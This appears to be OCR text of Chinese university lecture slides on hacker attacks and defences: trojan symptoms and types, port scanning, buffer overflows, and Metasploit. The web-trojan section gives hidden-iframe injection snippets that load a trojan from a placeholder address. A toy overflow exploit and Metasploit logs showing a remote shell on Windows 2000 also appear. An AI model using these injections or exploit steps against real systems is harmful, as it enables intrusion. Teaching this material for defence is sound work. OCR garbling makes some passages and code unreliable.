黑客攻擊與防范技術(shù)2黑客攻擊引起的網(wǎng)絡(luò)安全異常狀態(tài)診斷3

黑客攻擊引起的網(wǎng)絡(luò)安全異常

狀態(tài)診斷

崔寶江副教授博導(dǎo)

北京郵電大學(xué)計算機(jī)學(xué)院

cui_bj@

北郵?信息安全中心?崔寶江

目錄

主機(jī)被木馬遠(yuǎn)程控制的現(xiàn)象

二.黑客攻擊基本流程

三.黑客常見攻擊方法和防范措施

四.結(jié)束語

北郵?信息安全中心?崔寶江

主機(jī)被木馬遠(yuǎn)程控制的現(xiàn)象

I

□現(xiàn)象1：QQ、MSN的異常登錄提醒，你在登錄

QQ時，系統(tǒng)提示上一次的登錄IP利你完全不

相干。比如，你明明就只在上海的家里上過，

QQ卻提醒你上一次登錄地點(diǎn)在沈陽。

□現(xiàn)象2：網(wǎng)絡(luò)游戲登錄時發(fā)現(xiàn)裝備丟失或和你

上次下線時的位置不符，甚至用正確的密碼無

法登錄。

□現(xiàn)象3：有時會突然發(fā)現(xiàn)你的鼠標(biāo)不聽使喚，

在你不動鼠標(biāo)的時候，鼠標(biāo)也會移動，并且還

會點(diǎn)擊有關(guān)按鈕進(jìn)行操作。

北郵?信息安全中心?崔寶江

主機(jī)被木馬遠(yuǎn)程控制的現(xiàn)象

口現(xiàn)象4：正常上網(wǎng)時，突然感覺很慢，硬盤燈

在閃爍，就象你平時在COPY文件。

□現(xiàn)象5：當(dāng)你準(zhǔn)備使用攝像頭時，系統(tǒng)提示，

該設(shè)備正在使用中。

口現(xiàn)象6：在你沒有使用網(wǎng)絡(luò)資源時，你發(fā)現(xiàn)網(wǎng)

卡燈在不停閃爍。如果你設(shè)定為連接后顯示狀

態(tài)，你還會發(fā)現(xiàn)屏幕右下角的網(wǎng)卡圖標(biāo)在閃。

北郵?信息安全中心?崔寶江

木馬概述

1特洛伊木馬程序可以直接侵入用戶的電腦并進(jìn)

行破壞，它常被偽裝成工具程序或者游戲等誘使用

戶打開帶有木馬程序的郵件附件或從網(wǎng)上直接下載

,一旦用戶打開了這些郵件的附件或者執(zhí)行了這些

程序之后，它們就會在計算機(jī)系統(tǒng)中隱藏一個可以

在啟動時悄悄執(zhí)行的程序。這種遠(yuǎn)程控制工具可以

完全控制受害主機(jī)，危害極大。

WindowsT：

Netbus>subseven、BO、冰河、網(wǎng)絡(luò)神偷等

UNIX下：

Rhost++>Login后|】、rootkit等北郵?信息安全中心?代

木馬組成

L對木馬程序而言，它一般包括兩個部分：客戶端和服務(wù)器

上山

“而。

?服務(wù)器端安裝在被控制的計算機(jī)中，它一般通過電子郵件

或其他手段讓用戶在其計算機(jī)中運(yùn)行，以達(dá)到控制該用戶

計算機(jī)的目的。

?客戶端程序是控制者所使用的，用于對受控的計算機(jī)進(jìn)行

控制。服務(wù)器端程序和客戶端程序建立起連接就可以實(shí)現(xiàn)

對遠(yuǎn)程計算機(jī)的控制了。

?木馬運(yùn)行時，首先服務(wù)器端程序獲得本地計算機(jī)的最高操

作權(quán)限，當(dāng)本地計算機(jī)連入網(wǎng)絡(luò)后，客戶端程序可以與服

務(wù)器端程序直接建立起連接，并可以向服務(wù)器端程序發(fā)送

各種基本的操作請求，并由服務(wù)器端程序完成這些請求，

也就實(shí)現(xiàn)對本地計算機(jī)的控制了。北郵.信息安全中心.崔寶江為

?木馬本身不具備繁殖性和自動感染的功能?！?/p>

q木馬分類

?遠(yuǎn)程訪問型木馬是現(xiàn)在最廣泛的特洛伊木馬，它可以訪問受害人的硬

盤，并對其進(jìn)行控制。這種木馬用起來非常簡單，只要某用戶運(yùn)行一下服

務(wù)端程序，并獲取該用戶的IP地址，就可以訪問該用戶的計算機(jī)。這種木

馬可以使遠(yuǎn)程控制者在本地機(jī)器上做任意的事情，比如鍵盤記錄、上傳和

下載功能、截取屏幕等等。這種類型的木馬有著名的BO(BackOffice)

和國產(chǎn)的冰河等。

?密碼發(fā)送型木馬的目的是找到所有的隱藏密碼，并且在受害者不知道的

情況下把它們發(fā)送到指定的信箱。大多數(shù)這類的木馬不會在每次的

Windows重啟時重啟，而且它們大多數(shù)使用25端口發(fā)送E-mail。

?鍵盤記錄型木馬非常簡單的，它們只做一種事情，就是記錄受害者的鍵

盤敲擊，并且在LOG文件里做完整的記錄。這種特洛伊木馬隨著

Windows的啟動而啟動，知道受害者在線并且記錄每一件事。

?毀壞型木馬的唯一功能是毀壞并且刪除文件。這使它們非常簡單，并且

很容易被使用。它們可以自動地刪除用戶計算機(jī)上的所有的.DLL、INI或

EXE文件。

?FTP型木馬打開用戶計算機(jī)的21端口(FTP所使用的默認(rèn)端口)，像等

一個人都可以用一個FTP客戶端程序來不用密朝建則談評算機(jī)承前減

可以進(jìn)行最高權(quán)限的上傳下載。

木馬分類

f二代木馬

□冰河、廣外女生

?第三代木馬

口灰鴿子

。反彈端口技術(shù)

?第四代木馬

□廣外幽靈、廣外男生

。線程插入

?第五代木馬

口進(jìn)程、端口、文件、注冊表隱藏

北郵?信息安全中心?崔寶江

第3代木馬一反彈端口木馬1

連接請求

攻擊者h(yuǎn)ttp

ClientServer

黑客用戶

北郵?信息安全中心?崔寶江

Web/ftp服務(wù)器北郵?信息安全中心?崔寶江

第4代木馬一線程插入

?系統(tǒng)/應(yīng)用程序gwboy.dll

昌Vindovs任務(wù)管理器

文件3）選項(xiàng)查看9幫助QP

聯(lián)網(wǎng)

用

映像名稱戶名

jfxc.had.exe

TINTSETP.EXE36oog

msinfo32exe3924

msinn.exe3968oo12,

TPHKMGR.exe3892oo2,

37oo

Foxn&il.ex?923,，

TpScrex.exe3476oo叩

retlsched.?x?3420

explorer.exe34360133,

agentsvrexe3392005,

32

WINWORD.EXE56005,

32

SysSafe.exe36005,

31笫002,1

taslongr.exe4000

ctfmon.este56

29006,

coniine.exe284400

PGPtray.exe280000

igfxtray.exe

□顯示所有用戶的進(jìn)程堪）|結(jié)束進(jìn)程豆）〕

進(jìn)程數(shù)：53CPU使用：律提交更改：45毓/1857M

共山"信息安全中心.崔寶江

第5代木馬一進(jìn)程隱藏

北郵?信息安全中心?崔寶江

第5代木馬一無端口木馬

臨時端口7000

服務(wù)端

木馬會選擇一些常用的端口，如80、23,有些非常先進(jìn)的木馬還可

以做到在占領(lǐng)HTTP(80)端口后，收到正常的HTTP請求仍然把它交

與Web服務(wù)器處理，只有收到一些特殊約定的數(shù)據(jù)包后，才調(diào)用木

馬程序。

北郵?信息安全中心?崔寶江

木馬演示

?木馬演示

北郵?信息安全中心?崔寶江

TCP/IP協(xié)議簇

TCP三次握手機(jī)制

主機(jī)A：客戶端主機(jī)B：服務(wù)端

o自

發(fā)送TCPSYN分段

1)(seq=100ctl=SYN)

SYNreceived

發(fā)送TCPSYN&ACK分段

SYNreceived(seq=300ack=101ctl=syn,ack)

Established

少(seq=101ack=301ctl=ack：

北郵?信息安全中心?崔寶江

32bit

816

IIIIIIIIIII

源端口目的端口

序號

20字節(jié)的

TCP確認(rèn)號固定首部

首部FWAP

保留CS窗口

偏移H

檢驗(yàn)和緊急指針

選項(xiàng)（長度可變）填充

TCP報文段TCP首部TCP數(shù)據(jù)部分

發(fā)送在前1

IP首部IP數(shù)據(jù)部分V

北郵?信息安全中心?崔寶江

TCP/IP相關(guān)問題

一個TCP頭包含6個標(biāo)志位。它們的意義如下所

述：

SYN:標(biāo)志位用來建立連接，讓連接雙方同步序列號。如果SYN=1而ACK=O,則表示該

數(shù)據(jù)包為連接請求，如果SYN=1而ACK=1則表示接受連接；

FIN:表示發(fā)送端已經(jīng)沒有數(shù)據(jù)要求傳輸了，希望釋放連接；

RST:用來復(fù)位一個連接。RST標(biāo)志置位的數(shù)據(jù)包稱為復(fù)位包。一般情況下，如果TCP收

到的一個分段明顯不是屬于該主機(jī)上的任何一個連接，則向遠(yuǎn)端發(fā)送一個復(fù)位包；

URG:為緊急數(shù)據(jù)標(biāo)志。如果它為1,表示本數(shù)據(jù)包中包含緊急數(shù)據(jù)。此時緊急數(shù)據(jù)指針

有效；

ACK:為確認(rèn)標(biāo)志位。如果為1,表示包中的確認(rèn)號時有效的。否則，包中的確認(rèn)號無

效；

P骷％相攙%，聾爵趣跋嘏駛絨”懶碑。北郵.信息安全中心,崔寶江⑤)

端口掃描基礎(chǔ)

:匕叫'?侶是女生甲心至玉江飛

TCP三次握手機(jī)制

主機(jī)A：客戶端主機(jī)B：服務(wù)端

o自

發(fā)送TCPSYN分段

1)(seq=100ctl=SYN)

SYNreceived

發(fā)送TCPSYN&ACK分段

SYNreceived(seq=300ack=101ctl=syn,ack)

Established

少(seq=101ack=301ctl=ack：

北郵?信息安全中心?崔寶江

問題

?黑客如何入侵？

?我們?nèi)绾文軌驒z測出來?

北郵?信息安全中心?崔寶江

目錄

—.主機(jī)被控的現(xiàn)象

黑客攻擊基本流程

三.黑客常見攻擊方法和防范措施

四.結(jié)束語

北郵?信息安全中心?崔寶江

二.黑客攻擊基本流程

二黑客攻擊基本流程

口誘騙式攻擊

口主動定點(diǎn)攻擊

北郵?信息安全中心?崔寶江

二.黑客攻擊基本流程

』-

?二.黑客攻擊基本流程

口誘騙式攻擊

。誘騙打開網(wǎng)站或者點(diǎn)擊網(wǎng)站鏈接

。誘騙從網(wǎng)站下載文件

。誘騙打開電子郵件附件或者頁面中的隱藏鏈接

。誘騙打開QQ、MSN發(fā)來的文件或者鏈接

。通過網(wǎng)絡(luò)或者U盤等介質(zhì)感染病毒

網(wǎng)

北郵?信息安全中心?崔寶江

二.黑客攻擊基本流程

?網(wǎng)頁掛馬

口在網(wǎng)頁代碼中加入隱蔽的框架

?？蚣艿拇a如下：

O<iframesrc=地址width=Oheight=Ox/iframe>

。其中“地址”就是木馬所在的遠(yuǎn)程地址，"width=O

height=O”意味著該框架為不可視的，用戶就很難

發(fā)現(xiàn)木馬的運(yùn)行。

北郵?信息安全中心?崔寶江

二.黑客攻擊基本流程

?網(wǎng)頁掛馬

□通過Html文件的body標(biāo)記進(jìn)行掛馬

Otop.document.body.innerHTML=

top.document.body.innerHTML+V\n<iframe

src=地址width=,0,height=,O,x/iframe>,;

北郵?信息安全中心?崔寶江

二.黑客攻擊基本流程

?網(wǎng)頁掛馬

□偽裝掛馬：在某些特定的位置嵌入木馬的運(yùn)

行代碼

O圖片偽裝：在圖片打開之前，執(zhí)行了一個寫有木

馬地址的框架。

<html>

<iframesrc="網(wǎng)馬地址"height=Owidth=0x/iframe>

<imgsrc="圖片地址”>v/center>

</html>

北郵?信息安全中心?崔寶江

二,黑客攻擊基本流程

?捆綁式欺騙

口將木馬利目標(biāo)文件進(jìn)行捆綁后形成一個具有迷

惑性的文件

北郵?信息安全中心?崔寶江

二.黑客攻擊基本流程

二黑客攻擊基本流程

口誘騙式攻擊

口主動定點(diǎn)攻擊

北郵?信息安全中心?崔寶江

主動定點(diǎn)攻擊步驟

預(yù)攻擊探測

t收集信息，如OS類型,提供的服務(wù)端口

發(fā)現(xiàn)漏洞,采取攻擊行為

t破解口令文件，或利用緩存溢出漏洞

獲得攻擊目標(biāo)的控制權(quán)系統(tǒng)

t獲得系統(tǒng)帳號權(quán)限，并提升為root權(quán)限

安裝系統(tǒng)后門

t方便以后使用

繼續(xù)滲透網(wǎng)絡(luò)，直至獲取機(jī)密數(shù)據(jù)

t以此主機(jī)為跳板，尋找其它主機(jī)的漏洞

消滅蹤跡北郵?信息安全中心?崔寶江

消除所有入侵腳印，以免我譽(yù)理負(fù)蓑覺J

目錄

—.主機(jī)被控的現(xiàn)象

二.黑客攻擊基本流程

三.黑客常見攻擊方法和防范措施

四.結(jié)束語

北郵?信息安全中心?崔寶江

三.黑客常見攻擊方法和防范措施

1.網(wǎng)絡(luò)與主機(jī)的漏洞掃描和攻擊

2.緩沖區(qū)溢出攻擊

3.SQL注入攻擊

4.口令破解和嗅探

5.拒絕服務(wù)攻擊

6.ARP欺騙

北郵?信息安全中心?崔寶江

端口掃描基礎(chǔ)

?掃描原理

□1）全TCP連接

□2）SYN掃描（半打開式掃描）

O發(fā)送SYN,遠(yuǎn)端端口開放,則回應(yīng)SYN=1,ACK=1，本地發(fā)送RST給遠(yuǎn)端,

拒絕連接

。發(fā)送SYN,遠(yuǎn)端端口未開放，回應(yīng)RST

□3）FIN掃描（秘密掃描）

。本地發(fā)送FIN=1,遠(yuǎn)端端口開放，丟棄此包，不回應(yīng)

。本地發(fā)送FIN=1,遠(yuǎn)端端口未開放，返回一個RST包

北郵?信息安全中心?崔寶江

TCP三次握手機(jī)制

主機(jī)A：客戶端主機(jī)B：服務(wù)端

o自

發(fā)送TCPSYN分段

1)(seq=100ctl=SYN)

SYNreceived

發(fā)送TCPSYN&ACK分段

SYNreceived(seq=300ack=101ctl=syn,ack)

Established

少(seq=101ack=301ctl=ack：

北郵?信息安全中心?崔寶江

全TCP連接

”期以來TCP端口掃描的基礎(chǔ)

□掃描主機(jī)嘗試（使用三次握手）與目的機(jī)指定端口建

立建立正規(guī)的連接

?連接由系統(tǒng)調(diào)用connect。開始

口對于每一個監(jiān)聽端口，connect。會獲得成功，否則返

回一1,表示端口不可訪問

?很容易被檢測出來

□Courtney,Gabriel和TCPWrapper監(jiān)測程序通常用來進(jìn)

行監(jiān)測。另外，TCPWrapper可以對連接請求進(jìn)行控

制，所以它可以用來阻止來自不明主機(jī)的全連接掃描

北郵?信息安全中心?崔寶江

TCPSYN掃描

北郵?信息安全中心?崔寶江

]/r~

TCPFIN掃描

北郵?信息安全中心?崔寶江

端口掃描基礎(chǔ)

?利用TCP/IP來識別不同的操作系統(tǒng)和服務(wù)

?向系統(tǒng)發(fā)送各種特殊的包，根據(jù)系統(tǒng)對包

回應(yīng)的差別，推斷出操作系統(tǒng)的種類

?端口掃描程序利用的部分特征

口ICMP錯誤信息抑制

口服務(wù)類型值(TOS)

口TCP/IP選項(xiàng)

□對SYNFLOOD的抵抗力

口TCP初始窗口

北郵?信息安全中心?崔寶江

高級掃描技術(shù)-慢速掃描

A如果掃描是對非連續(xù)性端口、源地址不一致、時

間間隔很長且沒有規(guī)律的掃描的話，這些掃描的

記錄就會淹沒在其他眾多雜亂的日志內(nèi)容中

＞使用慢速掃描的目的就是騙過防火墻和入侵檢測

系統(tǒng)而收集信息。雖然掃描所用的時間較長，但

是這是一種較難發(fā)現(xiàn)的掃描

北郵?信息安全中心?崔寶江

高級掃描技術(shù)-亂序掃描

A普通的掃描器在掃描遠(yuǎn)程系統(tǒng)的端口時，對端口

掃描的順序是有序的，這種按照一定的順序掃描

端口的方式很容易被入侵檢測系統(tǒng)發(fā)覺。

A亂序掃描的端口號的順序是隨機(jī)生產(chǎn)的，這種方

式能有效的欺騙某些入侵檢測系統(tǒng)而不會被入侵

檢測系統(tǒng)發(fā)覺

[■端口掃描工具（Windows平臺）

工

>SuperScan

>Nmap

網(wǎng)

北郵?信息安全中心?崔寶江

端口掃描工具：SuperScan

。SuperScan3.00

Jd

IPTimeoutScantypeScan

pinging

Stag01Q10.155-2JPingrResolvehostnames

|400Onlyscanresponsiveping$00

Stop|00

ShowhoslresponsesScannim

PrevC|Nextc|1..254|Connect：發(fā)Pingonly10.10,10155

[2000~

rEveryportinlistResolving

“IgnoreIPzeroAllselectedportsinlist

Read

BIgnoreIP255Alllistportsfrom655#：

|400(f

FExtractfromfile「「

AllportsfromI46S535

Speed

Maxay55Activehosts

B?21FileTransferProtocol[Control]

E*3220IsMicrosoftFTPService(Version50)…500"：commandnotunderstcOpenports

日?25SimpleMailTransfer3

畫

220IsMicrosoftESMTPMAILService,Version:5.0.2172.1readyatTueSave

日?「而WohdWideWei用背隹

&HTTM.i302Objectmoved.Server:Microwft-IISZ5.0..Date:Tue,22JJCollapseall

Expandall

±]Prune

端口掃描工具：NmapNT

北郵?信息安全中心?崔寶江

針對預(yù)攻擊探測的防范措施

?Pingsweep

安裝防火墻或相關(guān)工具軟件，禁止某些ICMPping,使用

NAT隱臧內(nèi)部網(wǎng)絡(luò)結(jié)構(gòu)

Portscan

安裝防火墻或相關(guān)工具軟件，禁止訪問不該訪問的服務(wù)端口

OSfingerprint

安裝防火墻或相關(guān)工具軟件，只允許訪問少量服務(wù)端口，由

于攻擊者缺乏必要的信息，無法判斷OS類型

資源和用戶掃描

防范NetBIOS掃描的最直接方法就是不允許對TCP/UDP135

到139端口的訪問，如通過防火墻或路由器的配置等。另外，

對單獨(dú)的主機(jī)，可使用NetBIOSoverTCP/IP項(xiàng)失效或注冊表

配置來實(shí)現(xiàn)。

北郵?信息安全中心?崔寶江

漏洞掃描和攻擊概述

漏洞掃描是一種最常見的攻擊模式

,用于探測系統(tǒng)和網(wǎng)絡(luò)漏洞，如獲取系

統(tǒng)和應(yīng)用口令，嗅探敏感信息，利用緩

存區(qū)溢出直接攻擊等。

針對某一類型的漏洞，都有專門的

攻擊工具。另外，也有一些功能強(qiáng)大綜

合掃描工具，針對系統(tǒng)進(jìn)行全面探測和

漏洞掃描，如流光等。

北郵?信息安全中心?崔寶江g

I綜合掃描

I安全掃描審計;

口分類

。網(wǎng)絡(luò)安全掃描

。系統(tǒng)安全掃描

口優(yōu)點(diǎn)

。較全面檢測流行漏洞

。降低安全審計人員的勞動強(qiáng)度

。防止最嚴(yán)重的安全問題

口缺點(diǎn)

。無法跟上安全技術(shù)的發(fā)展速度

。只能提供報告，無法實(shí)際解決

O可能出現(xiàn)漏報和誤報

北郵?信息安全中心?崔寶江

漏洞利用周期圖表

入侵者采用公自動掃描安全

布的攻擊代碼漏洞工具發(fā)布

簡陋的漏洞

自動掃描安全漏入侵者著眼

攻擊代碼發(fā)布洞工具廣泛流傳

新的漏洞

資深黑客

發(fā)現(xiàn)漏洞

3

北郵?信息安全中心?崔寶江

綜合掃描器的使用

漏洞描述與解決方法

■皿可耽仝絹a知瑞

所。的，“甫做出可以以典?色趣?小，

雙擊*amt囑SMBH力9蛆只名被即從再Hfl入U尿“%

RSASNSF0CV8?觸保期奸！MfcUMfBLl電：

?般共*，都期:

麻力室

,確火埴上seM睢制a共N務(wù)的訪利：

?嫌■足幅愉口敘

北郵?信息安全中心?崔寶江

哪些方面對系統(tǒng)進(jìn)行安全評估

為堵死安全策略和安全措施之間的缺口,必須從

以下三方面對網(wǎng)絡(luò)安全狀況進(jìn)行評估：

從企業(yè)外部進(jìn)行評估:考察企業(yè)計算機(jī)基礎(chǔ)設(shè)

施中的防火墻;

從企業(yè)內(nèi)部進(jìn)行評估:考察內(nèi)部網(wǎng)絡(luò)系統(tǒng)中的

計算機(jī);

從應(yīng)用系統(tǒng)進(jìn)行評估:考察每臺硬件設(shè)備上運(yùn)

行的操作系統(tǒng)。

北郵?信息安全中心?崔寶江

綜合掃描和攻擊工具演示

?流光

?X-Scan

?SSS

?Nessus

北郵?信息安全中心?崔寶江

漏洞攻擊的防范措施

?安裝防火墻，禁止訪問不該訪問的服務(wù)端口，使用

NAT隱藏內(nèi)部網(wǎng)絡(luò)結(jié)構(gòu)

?安裝入侵檢測系統(tǒng)，檢測漏洞攻擊行為

?安裝安全評估系統(tǒng)，先于入侵者進(jìn)行模擬漏洞攻擊,

以便及早發(fā)現(xiàn)漏洞并解決

?提高安全意識，經(jīng)常給操作系統(tǒng)和應(yīng)用軟件打補(bǔ)丁

北郵?信息安全中心?崔寶江

三.黑客常見攻擊方法和防范措施

1.網(wǎng)絡(luò)與主機(jī)的漏洞掃描和攻擊

2,緩沖區(qū)溢出攻擊

3.SQL注入攻擊

4.口令破解和嗅探

5.拒絕服務(wù)攻擊

6.ARP欺騙

北郵?信息安全中心?崔寶江

緩沖區(qū)溢出攻擊

十年來最大的安全問題

這是一種系統(tǒng)攻擊手段，通過向程序的緩沖區(qū)

寫超出其長度的內(nèi)容，造成緩沖區(qū)的溢出，從而

破壞程序的堆棧，使程序轉(zhuǎn)而執(zhí)行其它指令，以

達(dá)到攻擊的目的。這種攻擊可以使得一個匿名的

Internet用戶有機(jī)會獲得一臺主機(jī)的部分或全部

的控制權(quán)。

北郵?信息安全中心?崔寶江

緩沖區(qū)溢出基本原理

受攻擊程序vulnerable.c

voidmain(intargc,char^argv[])

charbuff[1024];

if(argc>1)

strcpy(buff,argv[l]);

北郵?信息安全中心?崔寶江

緩沖區(qū)溢出基本原理

攻擊程序exploit,c

#include<stdio.h>

#include<unistd.h>

voidmain(){

charstring[2000];

for(i=0;i<2000;i++)string[i]='A';

execl(''./vulnerable“Jvulnerable''string,0);

北郵?信息安全中心?崔寶江

緩沖區(qū)溢出基本原理

Vulnerable.cmain（）函數(shù)的堆棧情況

buff和]（棧頂）buff^[AAAA]（棧頂）

[……]

[AAAA]

[其他寄存器值][AAAA]

[ebp][AAAA]^ebp

[ret][AAAA]-ret

北郵?信息安全中心?崔寶江

AvailableExploits(8)Baa

SEARCH06_040

Matched1modulesforterm06040

MicrosoftServerServiceNetpwPathCanonicalizeOverflow

ThismoduleexploitsastackoverflowintheNetApi32CanonicalizePathName()functionusingthe

NetpwPathCanonicalizeRPCcallintheServerServiceItislikelythatotherRPCcallscouldbeusedto

exploitthisservice.ThisexploitwillresultinadenialofserviceononWindowsXPSP2orWindows

2003SP1.AfailedexploitattemptwilllikelyresultinacompleterebootonWindows2000andthe

terminationofallSfvIB-relatedservicesonWindowsXPThedefaulttargetforthisexploitshould

succeedonWindowsNT4.0.Windows2000SP0-SP4*WindowsXPSP0-SP1andWindows2003

SP0.

完成&<

OMetasplatFrame...里坤?10:27

Rit￥7而翼i胃、y笳i|函工儂fjj

文件㈤端輯（f）查看歷史⑸書簽回TM（I）朝助省）

■http:〃:55555/GO@tGoogle

■新手上路?最新頭條

?Disable?JkCookies*■CSS*■Forms*■Images*SInformation*?Msceianeous?Outfine*JJResize*Tools*OViewSource*Options*

嗓ExploitsAuxilianes?Payloads.ConsoleSessions妙A(yù)bout

MicrosoftServerServiceNetpwPathCanonicalizeOverflow(10)EJBE3

ThismoduleexploitsastackoverflowintheNetApi32CanonicalizePathName()functionusingthe

NetpwPathCanonicalizeRPCcallintheServerServiceItislikelythatotherRPCcallscouldbe

usedtoexploitthisserviceThisexploitwillresultinadenialofserviceononWindowsXPSP2or

Windows2003SP1AfailedexploitattemptwilllikelyresultinacompleterebootonWindows2000

andtheterminationofallSMB-relatedservicesonWindowsXPThedefaulttargetforthisexploit

shouldsucceedonWindowsNT40Windows2000SP0-SP4+WindowsXPSP0-SP1and

Windows2003SP0.

Thismodule(v4532)wasprovidedbyhdmundertheMetasploitFrameworkLicense

Selectatargettocontinue:

o(wcscpy)Automatic(NT4.0,2000SP0-SP4.XPSP0-SP1)

o(wcscpy)WindowsNT4.0IWindows2000SP0SP4

o(wcscpy)WindowsXPSP0/SP1

0(stack)WindowsXPSP1English

o(stack)WindowsXPSP1Italian

o(wcscpq)Windows2003SP0

戚若陽|*擊4aO■MetasplatFrame...里坤?10:27

Rit￥7而翼i胃、y笳i|函工儂fjj

文件㈤端輯（f）查看歷史⑸書簽回TM（I）朝助省）

■http:〃:55555/GO@tGoogle

■新手上路?最新頭條

?Disable?JkCookies*■CSS*■Forms*■Images*SInformation*?Msceianeous?Outfine*JJResize*Tools*OViewSource*Options*

嗓ExploitsAuxilianes?Payloads.ConsoleSessions妙A(yù)bout

OMetasplatFrame...里坤?10:27

或幅附泡w彷門”?了:因】，箋依■野酎,南仔啟口荏戶

nmraaYd11Au

文件（￡）編梅3登看（？）歷史⑸書簽坦）TM（T）幫助出）???

■▼二'QC.'http:〃:55555/C3OBLGoogle

■新手上路照最新頭條

0Disable*ACookies*■CSS*■Forms*HImages*SInformation*?Miscdteneou5y/Outfne~J*Resize*Toot*flViewSource*Options*

IEIHQ

WelcometotheMetasploitWebConsole!

)/1/一)\lI

III((//Il_((II_IIIIII

./III-/

=[msfv3.0

+——=[176exploits-104payloads

+——=L17encoders-bnops

=[30aux

Startedreversehandler

DetectedaWindows2000target

Bindingto4b324fc8-1670-01d3-1278-5a47bf6eel88:3.0@ncacn_np:01[\BROWSER]

Boundto4b324fc8-1670-01d3-1278-5a47bf6eel88:3.0@ncacn_np:01[\BROWSER]...

Buildingthestubdata...

Callingthevulnerablefunction...

Commandshellsession1opened(10:4444->01:1061)

MicrosoftWindows2000[Version5.00.2195]

(C)Copyright1985-2000MicrosoftCorp.

C:\WINNT\system32>

(running)

III

完成&

矽MetasploitFramewor...一國3

A出高i￥閨/席值的7K；］iVJEillHl-①

文件（E）編物但查看區(qū)）歷史⑸書簽回工具①稽助電）址

4.“?C.■http:〃:55555/(30BLGoogle

新手上路?最新頭條

?Disable~4^Cookies*■CSS*■Forms*■Images**Information**Miscellaneous*XOutline*J*Resee*/Tools'-ViewSource*Options*

MetasoloitExploit(11)QHQ

1469File(s)198,627,441bytes

28Dir(s)3,218,411,520bytesfree

C:\WINNT\system32>

?dirc:\/a

dirc:\/a

VolumeindriveChasnolabel.

VolumeSerialNumberis0081-F487

Directoryofc:\

08/27/200710:01p27123.txt

06/19/200306:05p150,528arcldr.exe

06/19/200306:05p163,840arcsetup.exe

08/15/200709:59p0AUTOEXEC.BAT

08/15/200709:53p192boot.ini

08/15/200709:59p0CONFIG.SYS

09/01/200704:26a<DIR>DocumentsandSettings

08/15/200709:59p0IO.SYS

08/15/2007